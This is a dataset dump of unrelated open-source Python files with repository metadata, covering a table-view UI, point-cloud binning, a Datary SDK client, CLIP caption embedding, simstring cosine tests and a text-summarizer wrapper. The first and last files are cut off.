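ca = np.hypot(c_x - a_x, c_y - a_y)
area = abs(a_x * (b_y - c_y) + b_x * (c_y - a_y) + c_x * (a_y - b_y)) / 2.0
print(area, 2 * area / (ab + bc + ca), ab * bc * ca / (4.0 * area))  # 6.0 1.0 2.5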
| 31.183099
| 91
| 0.617435
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 351
| 0.158537
|
af71f9e9ddb2979aa18dd52c6ff6dae1a9583788
| 4,090
|
py
|
Python
|
Three-Column-Sortable-TableView.py
|
humberry/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 115
|
2015-03-01T20:22:19.000Z
|
2022-01-23T16:16:48.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 8
|
2015-01-05T10:12:24.000Z
|
2020-08-02T07:43:10.000Z
|
Three-Column-Sortable-TableView.py
|
clarityD/ui-tutorial
|
90ba337f64c429b234a6d035df8d096fb3248fc2
|
[
"MIT"
] | 37
|
2015-05-10T03:24:33.000Z
|
2022-03-11T04:06:47.000Z
|
# coding: utf-8
import ui, os, datetime
from operator import itemgetter
class MyTableViewDataSource(object):
def __init__(self, row_height):
self.row_height = row_height
self.width = None
def tableview_number_of_rows(self, tableview, section):
return len(tableview.data_source.items)
def tableview_cell_for_row(self, tableview, section, row):
self.width, height = ui.get_screen_size()
cell = ui.TableViewCell()
cell.bounds = (0, 0, self.width, self.row_height)
for i in range(3):
self.make_labels(cell, tableview.data_source.items[row][i], i)
return cell
def make_labels(self, cell, text, pos):
label = ui.Label()
label.border_color = "lightgrey"
label.border_width = 0.5
if pos == 2:
label.text = str(datetime.datetime.fromtimestamp(text))
else:
label.text = str(text)
label.frame = (pos * self.width / 3, 0, self.width / 3, self.row_height)
label.alignment = ui.ALIGN_CENTER
cell.content_view.add_subview(label)
class MyTableView(ui.View):
def __init__(self):
self.dirs = []
self.files = []
self.order = 'asc'
self.active_button = None
self.button_height = 50
self.btn_name = self.make_buttons("Name")
self.btn_size = self.make_buttons("Size")
self.btn_date = self.make_buttons("Date")
self.tv = ui.TableView()
self.tv.row_height = 30
self.tv.data_source = MyTableViewDataSource(self.tv.row_height)
self.get_dir()
self.all_items = self.dirs + self.files
self.tv.data_source.items = self.all_items
self.name = "TableView-Test"
self.tv.allows_selection = False
self.add_subview(self.tv)
self.present("fullscreen")
def make_buttons(self, name):
button = ui.Button()
button.name = name
button.title = name
button.border_color = 'blue'
button.border_width = 1
button.corner_radius = 3
button.background_color = 'white'
button.action = self.btn_action
self.add_subview(button)
return button
def btn_action(self, sender):
names = [self.btn_name.name, self.btn_size.name, self.btn_date.name] #['Name', 'Size', 'Date']
sender_index = names.index(sender.name) #0/1/2
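        # Each tap re-sorts all rows by the tapped column and flips the global
        # asc/desc toggle for the next tap.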
if self.order == 'asc':
self.order = 'desc'
self.all_items = sorted(self.all_items, key=itemgetter(sender_index))
else:
self.order = 'asc'
self.all_items = sorted(
self.all_items, key=itemgetter(sender_index), reverse=True
)
self.tv.data_source.items = self.all_items
self.tv.reload()
def layout(self):
self.tv.reload()
self.btn_name.frame = (
0 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_size.frame = (
1 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.btn_date.frame = (
2 * self.width / 3,
0,
self.width / 3,
self.button_height,
)
self.tv.frame = (
0,
self.button_height,
self.width,
self.height - self.button_height,
)
def get_dir(self):
path = os.getcwd()
if path == os.path.expanduser("~"):
self.dirs = []
else:
self.dirs = [["..", 0, 0.0]]
self.files = []
for entry in sorted(os.listdir(path)):
full_pathname = path + "/" + entry
if os.path.isdir(full_pathname):
date = os.path.getmtime(full_pathname)
self.dirs.append((entry, "<DIR>", date))
else:
size = os.path.getsize(full_pathname)
date = os.path.getmtime(full_pathname)
self.files.append((entry, size, date))
MyTableView()
| 31.953125
| 103
| 0.55868
| 3,998
| 0.977506
| 0
| 0
| 0
| 0
| 0
| 0
| 154
| 0.037653
|
af7371f20bd26e4f799d725d92aa211ad0557f49
| 668
|
py
|
Python
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | 2
|
2020-10-12T11:33:00.000Z
|
2021-12-20T06:33:54.000Z
|
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
binning/pozo_5m_binning.py
|
UP-RS-ESP/GEW-DAP04-WS201819
|
18341620d9168e1eec476af1d8f568cf0017bf56
|
[
"MIT"
] | null | null | null |
import numpy as np
from matplotlib import pyplot as pl
from matplotlib.colors import LogNorm
fn = '../pozo-steep-vegetated-pcl.npy'
pts = np.load(fn)
x, y = pts[:, 0], pts[:, 1]
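# Convert point coordinates to integer 5 m bin indices (factor 0.2 = 1 / 5 m cell size).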
ix = (0.2 * (x - x.min())).astype('int')
iy = (0.2 * (y - y.min())).astype('int')
shape = (100, 100)
#xb = np.arange(shape[1]+1)
#yb = np.arange(shape[0]+1)
xb = np.arange(x.min(), x.min()+500, 5)
yb = np.arange(y.min(), y.min()+500, 5)
bins = np.zeros(shape)
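# Count points per cell, i.e. a 2-D histogram over the 100 x 100 grid.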
for j in range(len(ix)):
bins[iy[j], ix[j]] += 1
cmap = pl.cm.magma_r
norm = LogNorm()
pl.pcolormesh(xb, yb, bins,
cmap = cmap,
#norm = norm,
)
pl.colorbar()
pl.axes().set_aspect('equal')
pl.show()
| 22.266667
| 40
| 0.586826
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 117
| 0.17515
|
af747dc207dec3cbffc1da1f8850f8e0ae2ec7ff
| 110
|
py
|
Python
|
lianapy/graphics.py
|
mlincett/lianapy
|
e38c58ffd11a886b5c025621d6ed60516ceb5b2a
|
[
"MIT"
] | null | null | null |
lianapy/graphics.py
|
mlincett/lianapy
|
e38c58ffd11a886b5c025621d6ed60516ceb5b2a
|
[
"MIT"
] | null | null | null |
lianapy/graphics.py
|
mlincett/lianapy
|
e38c58ffd11a886b5c025621d6ed60516ceb5b2a
|
[
"MIT"
] | null | null | null |
import matplotlib.pyplot as plt


def figure(nrows=1, ncols=1, figsize=(6, 6), dpi=150):
    return plt.subplots(nrows, ncols, figsize=figsize, dpi=dpi)
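# Hypothetical usage of the fixed helper: fig, ax = figure(1, 2, figsize=(8, 4), dpi=100)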
| 36.666667
| 55
| 0.690909
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af74d606a269a83e28010d18de482c23c6ab0542
| 5,600
|
py
|
Python
|
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
datary/operations/remove.py
|
Datary/python-sdk
|
2790a50e1ad262cbe3210665dc34f497625e923d
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
"""
Datary sdk Remove Operations File
"""
import os
from urllib.parse import urljoin
from datary.auth import DataryAuth
from datary.operations.limits import DataryOperationLimits
import structlog
logger = structlog.getLogger(__name__)
class DataryRemoveOperation(DataryAuth, DataryOperationLimits):
"""
Datary RemoveOperation module class
"""
def delete_dir(self, wdir_uuid, path, basename):
"""
Delete directory.
-- NOT IN USE --
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
path str path to directory
basename str directory name
================ ============= ====================================
"""
logger.info(
"Delete directory in workdir.",
wdir_uuid=wdir_uuid,
basename=basename,
path=os.path.join(path, basename))
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "delete",
"filemode": 40000,
"basename": path,
"basename": basename}
response = self.request(
url, 'GET', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"Directory has been deleted in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
else:
logger.error(
"Fail to delete Directory in workdir",
wdir_uuid=wdir_uuid,
url=url,
basename=basename,
path=path,
payload=payload)
def delete_file(self, wdir_uuid, element):
"""
Delete file.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
element Dic element with path & basename
================ ============= ====================================
"""
logger.info(
"Delete file in workdir.",
element=element,
wdir_uuid=wdir_uuid)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {
"action": "remove",
"filemode": 100644,
"basename": element.get('path'),
"basename": element.get('basename')
}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info(
"File has been deleted.",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
else:
logger.error(
"Fail to delete file in workdir",
url=url,
workdir=wdir_uuid,
path=element.get('path'),
basename=element.get('basename'))
def delete_inode(self, wdir_uuid, inode):
"""
Delete using inode.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
inode str directory or file inode.
================ ============= ====================================
"""
logger.info("Delete by inode.", wdir_uuid=wdir_uuid, inode=inode)
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
payload = {"action": "remove", "inode": inode}
response = self.request(
url, 'POST', **{'data': payload, 'headers': self.headers})
if response:
logger.info("Element has been deleted using inode.")
else:
logger.error(
"Fail to delete file by inode in workdir",
url=url,
workdir=wdir_uuid,
inode=inode)
def clear_index(self, wdir_uuid):
"""
Clear changes in repo.
================ ============= ====================================
Parameter Type Description
================ ============= ====================================
wdir_uuid str working directory uuid
================ ============= ====================================
"""
url = urljoin(self.URL_BASE,
"workdirs/{}/changes".format(wdir_uuid))
response = self.request(url, 'DELETE', **{'headers': self.headers})
if response:
logger.info("Repo index has been cleared.")
return True
else:
logger.error(
"Fail to clean the workdir index",
url=url,
workdir=wdir_uuid)
return False
| 32.55814
| 78
| 0.411786
| 5,335
| 0.952679
| 0
| 0
| 0
| 0
| 0
| 0
| 2,666
| 0.476071
|
af7521356a79a5c1bee31c5535d67e69471269c6
| 531
|
py
|
Python
|
widgets/migrations/0003_widgets_widget_type.py
|
briansok/derpi
|
0e111a84b17ce8caeb60d2899957a0a24cab47b3
|
[
"MIT"
] | null | null | null |
widgets/migrations/0003_widgets_widget_type.py
|
briansok/derpi
|
0e111a84b17ce8caeb60d2899957a0a24cab47b3
|
[
"MIT"
] | null | null | null |
widgets/migrations/0003_widgets_widget_type.py
|
briansok/derpi
|
0e111a84b17ce8caeb60d2899957a0a24cab47b3
|
[
"MIT"
] | 1
|
2019-03-07T04:30:36.000Z
|
2019-03-07T04:30:36.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.10.5 on 2017-06-12 10:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('widgets', '0002_auto_20170612_1201'),
]
operations = [
migrations.AddField(
model_name='widgets',
name='widget_type',
field=models.CharField(blank=True, choices=[('clock', 'Clock'), ('weather', 'Weather')], max_length=2, null=True),
),
]
| 25.285714
| 126
| 0.619586
| 373
| 0.702448
| 0
| 0
| 0
| 0
| 0
| 0
| 159
| 0.299435
|
af76cb63ff7f339b7e7e1d830fd28ab78f3db4d3
| 9,199
|
py
|
Python
|
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
parse_conceptual.py
|
HalimSD/A-eye
|
502dcdf47d54d93e8745be7c49897064550db8c7
|
[
"MIT"
] | null | null | null |
import torch
import clip
from torch.utils.data import DataLoader, Dataset
from PIL import Image
import pickle
from tqdm import tqdm
import os
import csv
import threading
import requests
import shutil
import PIL
from typing import List, Tuple, Optional
import argparse
from pathlib import Path
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
class ConceptualDS(Dataset):
@staticmethod
def get_all_data(data_root: str, suffix: str):
data = []
for i in range(2):
out_data_path = f"{data_root}/conceptual_{suffix}_{i:02d}.pkl"
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
raw_data = pickle.load(f)["info"]
data.append(raw_data)
return data
@staticmethod
def collect(data_root: str, suffix: str):
raw_data = ConceptualDS.get_all_data(data_root, suffix)
data = []
for thread_data in raw_data:
for item in thread_data:
data.append((item, thread_data[item]["caption"]))
return data
def __len__(self):
return len(self.data)
def __getitem__(self, item: int):
image_name, caption = self.data[item]
image_path = f"{self.data_root}/{self.suffix}/{image_name}.jpg"
is_error = False
image = self.dummy
try:
image = self.preprocess(Image.open(image_path)) #.resize(224))
except PIL.UnidentifiedImageError:
is_error = True
except OSError:
is_error = True
except BaseException:
is_error = True
if is_error:
return image, "", image_name
return image, caption, image_name
def __init__(self, data_root: str, preprocess, suffix: str):
self.suffix = suffix
self.data_root = data_root
self.data = self.collect(data_root, suffix)
# print(self.data)
self.preprocess = preprocess
self.dummy = torch.zeros(3, 224, 224)
def save_pickle(data, out_path: str, recover_index: Optional[int] = None):
if os.path.isfile(out_path) and recover_index is not None:
recover_path = f'{out_path[:-4]}_{recover_index:02d}.pkl'
shutil.copyfile(out_path, recover_path)
with open(out_path, 'wb') as f:
pickle.dump(data, f)
def get_image(url: str, out_path: str, timeout=10):
try:
r = requests.get(url, stream=True, timeout=timeout)
if r.status_code == 200:
with open(out_path, 'wb') as f:
r.raw.decode_content = True
shutil.copyfileobj(r.raw, f)
return True
return False
except BaseException:
return False
def thread(urls: List[Tuple[List[str], int]], thread_id: int, progress: tqdm, lock: Optional[threading.Lock],
suffix: str, conceptual_root: str):
out_root = f"{conceptual_root}/{suffix}"
out_data_path = f"{conceptual_root}/conceptual_{suffix}_{thread_id:02d}.pkl"
recover_index = 0
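    # recover_index alternates between 0 and 1 so save_pickle keeps a rolling
    # backup copy of the metadata before overwriting it (the final save uses 2).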
if os.path.isfile(out_data_path):
with open(out_data_path, 'rb') as f:
data = pickle.load(f)
# print(data)
parsed = data['parsed']
info = data['info']
else:
parsed = set()
info = {}
for i in range(0, len(urls)):
(caption, url), ind = urls[i]
name = f"{ind:08d}"
out_path = f"{out_root}/{name}.jpg"
if url not in parsed and not os.path.isfile(out_path) and get_image(url, out_path):
parsed.add(url)
info[name] = {"url": url, "caption": caption}
if lock is not None:
lock.acquire()
try:
progress.update()
finally:
lock.release()
else:
progress.update()
if (i + 1) % 10 == 0:
# print(f'BINNEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, recover_index)
recover_index = 1 - recover_index
# print(f'BUITEN = {info}')
save_pickle({'parsed': parsed, 'info': info}, out_data_path, 2)
return 0
def download_conceptual(conceptual_root: str, num_threads: int, num_images: int):
urls = []
for suffix in ( "train", "val"):
if suffix == "train":
training_path = f"{conceptual_root}/Train_GCC-training.tsv"
with open(training_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
train_sub_set_path = f'{conceptual_root}/subset_Train_GCC-training.tsv'
if not os.path.exists(train_sub_set_path):
myfile = Path(train_sub_set_path)
myfile.touch(exist_ok=True)
with open(train_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = train_sub_set_path
else:
val_path = f'{conceptual_root}/Validation_GCC-1.1.0-Validation.tsv'
with open(val_path, 'r') as f:
lines = f.readlines()
lines = lines[:num_images]
val_sub_set_path = f'{conceptual_root}/subset_Val_GCC-training.tsv'
if not os.path.exists(val_sub_set_path):
myfile = Path(val_sub_set_path)
myfile.touch(exist_ok=True)
with open(val_sub_set_path, 'w') as f:
for line in lines:
f.write(line)
tsv_path = val_sub_set_path
with open(tsv_path) as f:
read_tsv = csv.reader(f, delimiter="\t")
for i, row in enumerate(read_tsv):
urls.append((row, i))
progress = tqdm(total=len(urls))
if num_threads == 1:
thread(urls, 0, progress, None, suffix, conceptual_root)
else:
groups = []
threads = []
lock = threading.Lock()
split_size = len(urls) // num_threads
for i in range(num_threads):
if i < num_threads - 1:
groups.append(urls[i * split_size: (i + 1) * split_size])
else:
groups.append(urls[i * split_size:])
for i in range(num_threads):
threads.append(threading.Thread(target=thread, args=(groups[i], i, progress, lock, suffix, conceptual_root)))
for i in range(num_threads):
threads[i].start()
for i in range(num_threads):
threads[i].join()
progress.close()
def add_period(caption: str):
caption = caption.strip()
if caption[-1] != '.':
caption = caption + '.'
elif caption[-2] == ' ':
caption = caption[:-2] + '.'
return caption
def create_clip_embeddings(conceptual_root: str, clip_model_type: str):
all_embeddings = []
all_captions = []
for suffix in ("train", "val"):
clip_model, preprocess = clip.load(clip_model_type, device=device, jit=False)
clip_model = clip_model.eval()
ds = ConceptualDS(conceptual_root, preprocess, suffix)
dl = DataLoader(ds, batch_size=2, shuffle=False, drop_last=False)
progress = tqdm(total=len(dl))
counter = 0
clip_model_name = clip_model_type.replace('/', '_')
out_data_path = f"{conceptual_root}/conceptual_clip_{clip_model_name}_{suffix}.pkl"
recover_index = 0
for i, data in enumerate(dl):
images, captions, image_names = data
images = images.to(device)
with torch.no_grad():
prefix = clip_model.encode_image(images).to(device)
# print(f'prefix.shape = {prefix.shape}')
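            # Samples whose image failed to load come back with an empty caption;
            # mask them out of both the embeddings and the caption records.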
is_valid = list(map(lambda x: x != "", captions))
mask = torch.tensor(is_valid)
all_embeddings.append(prefix[mask])
captions = [caption for j, caption in enumerate(captions) if is_valid[j]]
image_names = [image_name for j, image_name in enumerate(image_names) if is_valid[j]]
all_captions.extend([{"caption": add_period(caption), "clip_embedding": counter + j, "image_id": image_name}
for j, (caption, image_name) in enumerate(zip(captions, image_names))])
progress.update()
counter += len(captions)
if (i + 1) % 1000 == 0:
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, recover_index)
recover_index = 1 - recover_index
save_pickle({"clip_embedding": torch.cat(all_embeddings, dim=0), "captions": all_captions}, out_data_path, 2)
progress.close()
return 0
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--data_root', default='./data/conceptual')
parser.add_argument('--clip_model_type', default="ViT-B/32", choices=('RN50', 'RN101', 'RN50x4', 'ViT-B/32'))
parser.add_argument('--num_threads', type=int, default=1)
args = parser.parse_args()
download_conceptual(args.data_root, args.num_threads, 100)
create_clip_embeddings(args.data_root, args.clip_model_type)
if __name__ == '__main__':
main()
| 37.70082
| 137
| 0.589521
| 1,665
| 0.180998
| 0
| 0
| 697
| 0.075769
| 0
| 0
| 1,040
| 0.113056
|
af7781158a003eb34d7e6424f047ba42deefc00b
| 1,797
|
py
|
Python
|
tests/measure/test_cosine.py
|
icfly2/simstring-1
|
e4a57603967c5d138ce021cedc09d509f75e1933
|
[
"MIT"
] | null | null | null |
tests/measure/test_cosine.py
|
icfly2/simstring-1
|
e4a57603967c5d138ce021cedc09d509f75e1933
|
[
"MIT"
] | null | null | null |
tests/measure/test_cosine.py
|
icfly2/simstring-1
|
e4a57603967c5d138ce021cedc09d509f75e1933
|
[
"MIT"
] | null | null | null |
# -*- coding:utf-8 -*-
from unittest import TestCase
from simstring.measure.cosine import CosineMeasure
class TestCosine(TestCase):
measure = CosineMeasure()
def test_min_feature_size(self):
self.assertEqual(self.measure.min_feature_size(5, 1.0), 5)
self.assertEqual(self.measure.min_feature_size(5, 0.5), 2)
def test_max_feature_size(self):
self.assertEqual(self.measure.max_feature_size(5, 1.0), 5)
self.assertEqual(self.measure.max_feature_size(5, 0.5), 20)
def test_minimum_common_feature_count(self):
self.assertEqual(self.measure.minimum_common_feature_count(5, 5, 1.0), 5)
self.assertEqual(self.measure.minimum_common_feature_count(5, 20, 1.0), 10)
self.assertEqual(self.measure.minimum_common_feature_count(5, 5, 0.5), 3)
def test_similarity(self):
x = ["a", "ab", "bc", "c"]
y = ["a", "ab", "bc", "cd", "e"]
self.assertEqual(round(self.measure.similarity(x, x), 2), 1.0)
self.assertEqual(round(self.measure.similarity(x, y), 2), 0.67)
z = ["a", "ab", "ba", "ab", "a"]
self.assertEqual(round(self.measure.similarity(z, z), 2), 1.0)
self.assertEqual(round(self.measure.similarity(x, z), 2), 0.58)
self.assertEqual(round(self.measure.similarity(x, y), 2), 0.67)
# Test as per paper trigrams with quotes of methyl sulphone and methyl sulfone
a = [' "m', '"me', 'met', 'eth', 'thy', 'hyl', 'yl ', 'l s', ' su', 'sul', 'ulf', 'lfo', 'fon', 'one', 'ne"', 'e" ']
b = [' "m', '"me', 'met', 'eth', 'thy', 'hyl', 'yl ', 'l s', ' su', 'sul', 'ulp', 'lph', 'pho', 'hon', 'one', 'ne"', 'e" ']
        self.assertEqual(round(self.measure.similarity(a, b), 3), 0.788)  # Matches the paper's worked example: 13 shared trigrams / sqrt(16 * 17) ~= 0.788.
| 47.289474
| 131
| 0.613244
| 1,689
| 0.9399
| 0
| 0
| 0
| 0
| 0
| 0
| 369
| 0.205342
|
af77fe8c502d0a33488b3425f1fba0230262d786
| 1,072
|
py
|
Python
|
expansions/config/insc.py
|
croot/blacksmith-2
|
3bb544139a18184a709ca7668f8e69f3ca361475
|
[
"Apache-2.0"
] | null | null | null |
expansions/config/insc.py
|
croot/blacksmith-2
|
3bb544139a18184a709ca7668f8e69f3ca361475
|
[
"Apache-2.0"
] | null | null | null |
expansions/config/insc.py
|
croot/blacksmith-2
|
3bb544139a18184a709ca7668f8e69f3ca361475
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
if DefLANG in ("RU", "UA"):
AnsBase_temp = tuple([line.decode("utf-8") for line in (
"Изменённые пункты: %s", # 0
"Очевидно параметры неверны.", # 1
"Настройки:\n", # 2
"Конфиг пуст.", # 3
"Вниание! Текущий jid сейчас удаляется, сейчас я зайду с нового.", # 4
"смена jid'а", # 5
"Теперь '%s' - мой основной JID.", # 6
"Нельзя! Итак подключен всего один клиент.", # 7
"Система не может выделить ресурсы на ещё один клиент.", # 8
"Не коннектится.", # 9
"Этот jid уже есть в списках.", # 10
"«%s» нет в списке клиентов.", # 11
"«%s» сейчас оффлайн." # 12
)])
else:
AnsBase_temp = (
"Changed options: %s", # 0
"Parameters are incorrect.", # 1
"Config:\n", # 2
"Config is empty.", # 3
"Attention! Current jid deleting now. I'll rejoin with new.", # 4
"jid change", # 5
"'%s' - my main JID now.", # 6
"Forbidden!", # 7
"The system can not allocate resources to another client.", # 8
"No connection.", # 9
"This jid is already in the list.", # 10
"'%s' not in clients-list.", # 11
"'%s' is offline." # 12
)
| 31.529412
| 72
| 0.602612
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1,115
| 0.827765
|
af78d3f22f044a728a9a4c210c9bf8cdba9f1cf9
| 7,170
|
py
|
Python
|
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
TextSummarizer.py
|
venkattrj/Refresh
|
563c901cc0a8d90f5d716a2661302ff8858f7334
|
[
"BSD-3-Clause"
] | null | null | null |
# Global objects
import datetime
import hashlib
import subprocess
import time
import nltk
from Prediction import Summarizer
from data_utils import DataProcessor
PAD_ID = 0
UNK_ID = 1
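# Load the vocabulary/embeddings once at import time and build a single shared
# Summarizer instance (model_cpu) that every Preprocess call reuses.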
vocab_dict, word_embedding_array = DataProcessor().prepare_vocab_embeddingdict()
# # print (len(vocab_embed_object.vocab_dict)-2)
model_cpu = Summarizer(vocab_dict, word_embedding_array)
class Preprocess:
def timestamp(self):
return datetime.datetime.fromtimestamp(time.time()).strftime('[%Y-%m-%d %H:%M:%S]')
def Hashhex(self, s):
"""Returns a heximal formated SHA1 hash of the input string.
Args:
s: The string to hash.
Returns:
A heximal formatted hash of the input string.
"""
h = hashlib.sha1()
        # hashlib needs bytes; encode str input so this also works on Python 3.
        h.update(s.encode("utf-8") if isinstance(s, str) else s)
return h.hexdigest()
def stanford_processing(self, log, story, highlights):
story_corenlp = None
highlights_corenlp = None
try:
log += self.timestamp() + " Start Stanford Processing (SSegmentation,Tokenization,NERTagging) ...\n"
story_corenlp = subprocess.check_output(['./corenlp.sh', story])
highlights_corenlp = subprocess.check_output(['./corenlp.sh', highlights])
log += self.timestamp() + " Stanford Processing finished.\n"
except Exception as e:
log += self.timestamp() + " Stanford Processing failed.\n" + str(e) + "\n"
return log, story_corenlp, highlights_corenlp
def corenlp_output_parser(self, text):
data_org = []
# data_ner = []
# data_orglower_anonym = []
data_org_vocabid = []
# Parse Stanford Output Data
# sentdata_list = corenlp_output.strip().split("Sentence #")[1:]
for sentdata in nltk.sent_tokenize(text):
line_org = []
# line_ner = []
for word in nltk.word_tokenize(sentdata):
line_org.append(word)
# if token.startswith("NamedEntityTag="):
# if token.startswith("NamedEntityTag=PERSON"):
# line_ner.append("PERSON")
# elif token.startswith("NamedEntityTag=LOCATION"):
# line_ner.append("LOCATION")
# elif token.startswith("NamedEntityTag=ORGANIZATION"):
# line_ner.append("ORGANIZATION")
# elif token.startswith("NamedEntityTag=MISC"):
# line_ner.append("MISC")
# else:
# line_ner.append("O")
data_org.append(line_org)
# data_ner.append(line_ner)
line_org_vocabid = [vocab_dict[word] if word in vocab_dict else UNK_ID
for word in line_org]
data_org_vocabid.append(line_org_vocabid)
return data_org, data_org_vocabid # data_ner, data_orglower_anonym
def stanford_output_modelIn_processing(self, log, story_corenlp, highlights_corenlp):
story_line_org = None
highlights_line_org = None
document_modelIn = None
try:
log += self.timestamp() + " Start model input preparation (StanOutputParsing,OriginalCases,NotAnonymized,VocabIdMap) ...\n"
story_line_org, story_org_vocabid = self.corenlp_output_parser(story_corenlp)
# print story_line_org, story_orglower_anonym_vocabid
highlights_line_org, _ = self.corenlp_output_parser(highlights_corenlp)
# print highlights_line_org
document_modelIn = DataProcessor().prepare_document_modelIn(story_org_vocabid, [], [])
# print document_modelIn
log += self.timestamp() + " Model input preparation finished.\n"
except Exception as e:
log += self.timestamp() + " Model input preparation failed.\n" + str(e) + "\n"
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
return log, story_line_org, highlights_line_org, document_modelIn
def refresh_prediction(self, log, document_modelIn, doclen):
# global model_cpu
# print document_modelIn, doclen
selected_sentids = None
try:
log += self.timestamp() + " Start predicting with Refresh (Best CNN-trained model from Narayan, Cohen and Lapata, 2018) ...\n"
selected_sentids = model_cpu.prediction(document_modelIn, doclen)
log += self.timestamp() + " Refresh prediction finished.\n"
except Exception as e:
log += self.timestamp() + " Refresh prediction failed.\n" + str(e) + "\n"
return log, selected_sentids
def run_textmode(self, text):
        '''Text MODE: summarize raw text without using side information.

        Returns (log, lead-3 baseline, Refresh summary, gold summary).
        '''
# Start a log
log = ""
try:
log += self.timestamp() + " Summarizing a text: No side information used.\n"
# No HTML Parsing and Text Extraction Needed
story = text
highlights = ""
# # Start Stanford Parsing for Sentence Segmentation, Tokenization and NER Tagging
# log, story_corenlp, highlights_corenlp = self.stanford_processing(log, story, highlights)
# print(log)
# if (story_corenlp is None) or (highlights_corenlp is None):
# raise Exception
# print story_corenlp, highlights_corenlp
# Stanford Output Parsing and Preparing input to the model
log, story_line_org, highlights_line_org, document_modelIn = self.stanford_output_modelIn_processing(log,
story,
highlights)
print(log)
if (story_line_org is None) or (highlights_line_org is None) or (document_modelIn is None):
raise Exception
# print story_line_org, highlights_line_org, document_modelIn
# print document_modelIn.shape
# SideNet Prediction
log, selected_sentids = self.refresh_prediction(log, document_modelIn, len(story_line_org))
print(log)
if (selected_sentids is None):
raise Exception
selected_sentids.sort()
print(selected_sentids)
# Generate final outputs
log += self.timestamp() + " Producing output summaries. \n"
slead = "\n".join([" ".join(sent) for sent in story_line_org[:3]])
srefresh = "\n".join([" ".join(story_line_org[sidx]) for sidx in selected_sentids])
sgold = "\n".join([" ".join(sent) for sent in highlights_line_org])
# print log
# print slead
# print ssidenet
# print sgold
return log, slead, srefresh, sgold
except Exception as e:
log += self.timestamp() + " Failed.\n" + str(e) + "\n"
print(log)
return log, "", "", ""
| 40.055866
| 138
| 0.58159
| 6,796
| 0.947838
| 0
| 0
| 0
| 0
| 0
| 0
| 2,454
| 0.342259
|
af7b2b1a93e2158eade57c472f0fd8b7130b6ddf
| 69
|
py
|
Python
|
vault/__init__.py
|
globocom/vault
|
4909cc022476e59022a1dc55d1bbabf49873ca80
|
[
"Apache-2.0"
] | 15
|
2015-03-19T13:05:06.000Z
|
2021-08-13T19:17:25.000Z
|
vault/__init__.py
|
globocom/vault
|
4909cc022476e59022a1dc55d1bbabf49873ca80
|
[
"Apache-2.0"
] | 24
|
2015-02-24T14:20:06.000Z
|
2021-12-15T13:33:52.000Z
|
vault/__init__.py
|
globocom/vault
|
4909cc022476e59022a1dc55d1bbabf49873ca80
|
[
"Apache-2.0"
] | 11
|
2016-09-12T07:54:01.000Z
|
2021-10-31T20:26:43.000Z
|
default_app_config = 'vault.apps.VaultConfig'
__version__ = '1.3.7'
| 17.25
| 45
| 0.753623
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 31
| 0.449275
|
af7b2d5d99f6baeaacbb0d347417a474259a0efd
| 447
|
py
|
Python
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
"BSD-3-Clause"
] | 62
|
2015-11-19T18:28:56.000Z
|
2021-12-27T02:50:30.000Z
|
setup.py
|
rahulpshah/nbexamples
|
b14421ef9a88828b5a0e76d376043ee0f13f9da8
|
[
